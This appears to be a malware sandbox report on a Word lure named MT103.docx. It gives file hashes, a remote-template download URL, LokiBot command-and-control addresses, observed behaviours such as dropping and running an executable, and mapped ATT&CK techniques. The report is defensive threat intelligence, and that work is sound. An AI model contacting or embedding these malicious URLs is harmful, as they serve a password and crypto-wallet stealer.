General

  • Target

    MT103.docx

  • Size

    10KB

  • Sample

    210622-2ykmz3fyw6

  • MD5

    fe5b477eb79cfd989a795ed9320f2e08

  • SHA1

    8224cc1161660bf79c3648ee9dd5e10f475ee444

  • SHA256

    1fb1fc6a0c468a93003ab6d6d1fb9b590a47b4f2712d430024ad63dd475c8418

  • SHA512

    f95392b5104806b32a5104021f47eabd5b61120ac43ea267681150bb311a15ce0c9028cfb57cbc7e8eb444d1ecbae391b888c9bc92dfe34ba2918a4182a537cf

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

https://windowsdefendercloudsettingsdummy_username@itsssl.com/liqwN

Extracted

Family

lokibot

C2

https://bnbrokenhead.cf/Bn4/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Targets

    • Target

      MT103.docx

    • Size

      10KB

    • MD5

      fe5b477eb79cfd989a795ed9320f2e08

    • SHA1

      8224cc1161660bf79c3648ee9dd5e10f475ee444

    • SHA256

      1fb1fc6a0c468a93003ab6d6d1fb9b590a47b4f2712d430024ad63dd475c8418

    • SHA512

      f95392b5104806b32a5104021f47eabd5b61120ac43ea267681150bb311a15ce0c9028cfb57cbc7e8eb444d1ecbae391b888c9bc92dfe34ba2918a4182a537cf

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Abuses OpenXML format to download file from external location

    • Loads dropped DLL

    • Uses the VBS compiler for execution

    • Suspicious use of SetThreadContext

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Exploitation for Client Execution

1
T1203

Defense Evasion

Scripting

1
T1064

Modify Registry

1
T1112

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Tasks